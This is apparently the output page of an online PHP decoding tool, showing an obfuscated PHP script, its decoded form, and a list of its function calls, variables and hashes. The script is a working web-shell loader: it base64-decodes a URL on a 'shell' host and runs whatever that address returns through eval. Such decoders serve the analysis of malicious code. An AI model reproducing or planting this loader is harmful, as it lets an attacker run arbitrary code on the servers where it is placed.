Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER..

Decoded Output download

<?php 
function get($url) { 
    $ch = curl_init(); 
 
    curl_setopt($ch, CURLOPT_HEADER, true); 
    curl_setopt($ch, CURLOPT_NOBODY, true); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);  
    curl_setopt($ch, CURLOPT_URL, $url); 
    curl_exec($ch); 
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);  
 
    if ($http_code == 200) { 
        curl_setopt($ch, CURLOPT_NOBODY, false); 
        curl_setopt($ch, CURLOPT_HEADER, false); 
        $data = curl_exec($ch); 
        curl_close($ch); 
        return $data; 
    } else { 
        curl_close($ch); 
        return false; 
    } 
} 
 
$x = '?>'; 
$url1 = base64_decode('aHR0cHM6Ly9zaGVsbC00M3QucGFnZXMuZGV2L2hheG9ybWVudGFoLnR4dA=='); 
$url2 = base64_decode('aHR0cHM6Ly9zaGVsbC00M3QucGFnZXMuZGV2L2hheG9ybWVudGFoLnR4dA=='); 
 
$script1 = get($url1); 
if ($script1 !== false && $script1 !== 404) { 
    eval($x . $script1); 
} else { 
    $script2 = get($url2); 
    if ($script2 !== false) { 
        eval($x . $script2); 
    } else { 
        echo "Both attempts failed."; 
    } 
} 
?>

Did this file decode correctly?

Original Code

<?php
function get($url) {
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_NOBODY, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); 
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); 

    if ($http_code == 200) {
        curl_setopt($ch, CURLOPT_NOBODY, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    } else {
        curl_close($ch);
        return false;
    }
}

$x = '?>';
$url1 = base64_decode('aHR0cHM6Ly9zaGVsbC00M3QucGFnZXMuZGV2L2hheG9ybWVudGFoLnR4dA==');
$url2 = base64_decode('aHR0cHM6Ly9zaGVsbC00M3QucGFnZXMuZGV2L2hheG9ybWVudGFoLnR4dA==');

$script1 = get($url1);
if ($script1 !== false && $script1 !== 404) {
    eval($x . $script1);
} else {
    $script2 = get($url2);
    if ($script2 !== false) {
        eval($x . $script2);
    } else {
        echo "Both attempts failed.";
    }
}
?>

Function Calls

get 1
curl_init 1
base64_decode 2

Variables

$x ?>
$url https://shell-43t.pages.dev/haxormentah.txt
$url1 https://shell-43t.pages.dev/haxormentah.txt
$url2 https://shell-43t.pages.dev/haxormentah.txt

Stats

MD5 b65553b4fa078b727118f138c0a83e41
Eval Count 0
Decode Time 86 ms